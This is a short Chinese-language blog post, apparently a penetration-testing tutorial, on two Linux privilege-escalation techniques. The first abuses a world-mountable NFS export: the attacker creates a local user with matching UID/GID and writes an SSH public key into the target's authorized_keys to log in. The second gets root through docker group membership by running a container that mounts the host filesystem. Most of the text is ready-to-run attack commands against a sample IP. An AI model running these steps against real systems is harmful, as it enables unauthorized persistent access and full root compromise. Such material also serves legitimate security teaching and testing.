当前位置:   article > 正文

nfs 挂载提权 + docker 用户组提权_nfs提权

nfs提权

nfs 挂载提权

目标机器192.168.206.143 需开启2049 nfs端口

在攻击机kali安装nfs:

sudo apt-get install nfs-common

查看目标开放的文件夹

showmount -e 192.168.206.143

回显:/home/peter *  说明可挂载/home/peter的所有目录

创建用户(root权限下)

  1. 在本机创建一个peter用户并且uid为1001 gid为1005即可

  2. 创建组并指定组GID:

  3. groupadd -g 1005 peter

  4. 创建用户并指定uid以及gid:

  5. adduser peter -uid 1001 -gid 1005

 

生成公钥和私钥

ssh-keygen

将公钥复制到创建的挂载目录下

cat /home/peter/.ssh/id_rsa.pub > /111/.ssh/authorized_keys 

赋值权限

chmod 700 .ssh

chmod 600 authorized_keys

 

用ssh 连接

ssh peter@192.168.206.143

docker 提权

Docker 运行的所有命令都是需要 sudo 来运行,那是因为 docker 需要 root 权限才能跑。

Docker 监护进程有一个特性,它能被允许访问 root 用户或者是在 docker 组里面的所有用户,这就如同拥有 root 的访问权限。

如果一个服务器有一个普通的用户,并且这个用户加入了 docker 组,则这个用户已经是 root 了,默认情况下,Docker 软件包是会默认添加一个 docker 用户组

命令: id  查看当前用户组信息

查看用户组  cat /etc/group

提权(需要能够从外网拉镜像):

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/神奇cpp/article/detail/848007
推荐阅读
相关标签
  

闽ICP备14008679号